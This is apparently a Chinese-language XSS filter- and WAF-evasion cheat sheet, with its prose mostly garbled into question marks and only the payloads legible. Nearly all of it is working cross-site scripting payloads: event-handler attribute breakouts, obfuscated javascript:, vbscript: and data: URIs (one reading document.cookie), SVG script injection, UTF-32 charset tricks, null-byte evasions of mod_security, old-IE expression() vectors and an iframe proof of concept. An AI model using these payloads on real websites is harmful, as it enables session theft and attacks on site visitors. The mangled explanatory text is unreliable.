??????????????
????<input value="XSStest" type=text>
?????????????? “><imgsrc=x  onerror=prompt(0);>?????????????<>?????????????????????“ autofocusonfocus=alert(1)//???????????????“ ???value?????????????????н??
????" onmouseover="prompt(0) x="
????" onfocusin=alert(1)     autofocus x="
????" onfocusout=alert(1)     autofocus x="
????" onblur=alert(1) autofocus     a="
????????????<script>?????
?????????????????
????<script>
????Var
????x=”Input”;
????</script>
????????????????“></script>?????????</script>?????????????????????????????????????н??alert()?? prompt()
????confirm() ?????磺
????“;alert(1)//
????????????????
????DOMfocusin??DOMfocusout???????????Щ??????????????????????С????磺
????";document.body.addEventListener("DOMActivate"??alert(1))//
????";document.body.addEventListener("DOMActivate"??prompt(1))//
????";document.body.addEventListener("DOMActivate"??confirm(1))//
??????????????б?

 

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

?????????????
?????????е????????
????<a
????href=”Userinput”>Click</a>
???????????javascript:alert(1)//??????<a
????href=”javascript:alert(1)//”>Click</a>
????????
?????????????Сд??
????JavaScript????
????javascript&#058;alert(1)
????javaSCRIPT&colon;alert(1)
????JaVaScRipT:alert(1)
????javas&Tab;cript:u0061lert(1);
????javascript:u0061lert&#x28;1&#x29
????javascript&#x3A;alert&lpar;document&period;cookie&rpar;      // AsharJaved
????IE10???o?URI?п??????VBScript
????vbscript:alert(1);
????vbscript&#058;alert(1);
????vbscr&Tab;ipt:alert(1)"
????Data URl
????data:text/html;base64??PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
????JSON????
????????????
????encodeURIComponent(&#039;userinput&#039;)
???????????
????-alert(1)-
????-prompt(1)-
????-confirm(1)-
???????
????encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
????encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)
????????????svg?????
??????????£?
????<svg><script>varmyvar=”YourInput”;</script></svg>
????????????
????www.site.com/test.php?var=text”;alert(1)//
???????????????”???
????<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
????????????????????XML????HTML?????????????2?α?????
?????????BUG
?????????BUG
?????????BUG??IE?к???飬???bug??UTF-7?????????????????????????????99% ??WAF?????
???????
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
????????????????
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img
????src=x onerror=prompt(0);>
????????????UTF-32???????
???????script?alert(1)?/script?
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
?????????
?????????????mod_security?????????????£?
????<scri%00pt>alert(1);</scri%00pt>
????<scrix00pt>alert(1);</scri%00pt>
????<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
????????????????PHP 5.3.8?????汾
??????BUG
????RFC?????н????????????????μ??????javascript?в???????
????<script>alert(1);</script>
????<%0ascript>alert(1);</script>
????<%0bscript>alert(1);</script>
????<%?? <//?? <!??<????????????<???????????????μ?payload
????<//     style=x:expression28write(1)29> // Works upto IE7
?????ο?http://html5sec.org/#71
????<!--[if]><script>alert(1)</script     --> // Works upto IE9
?????ο?http://html5sec.org/#115
????<?xml-stylesheet     type="text/css"?><root     style="x:expression(write(1))"/> // Works in IE7
?????ο? http://html5sec.org/#77
????<%div%20style=xss:expression(prompt(1))>     // Works Upto IE7
????Unicode????
????[onw+s*]????????????????on???????????????????????Ч??????????????fuzzing????????0×00??0xff????????£?
????IExplorer=     [0x09??0x0B??0x0C??0x20??0x3B]
????Chrome =     [0x09??0x20??0x28??0x2C??0x3B]
????Safari = [0x2C??0x3B]
????FireFox=     [0x09??0x20??0x28??0x2C??0x3B]
????Opera = [0x09??0x20??0x2C??0x3B]
????Android =     [0x09??0x20??0x28??0x2C??0x3B]
????x0b??Mod_security??????????????????????
????<a/onmouseover[x0b]=location=&#039;x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x30x29x3B&#039;>rhainfosec
???????X-frame???
????????????X-frame????????????????????????????????????iframe?????xss???
????Docmodes
????IE??????doc-mode????????????汾????????????????з????????????????????????????????????????doc-mode???css????
????expression(open(alert(1)))
????????POC???????IE7??
????<html>
????<body>
????<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
????<iframesrc="https://targetwebsite.com">
????</body>
????</html>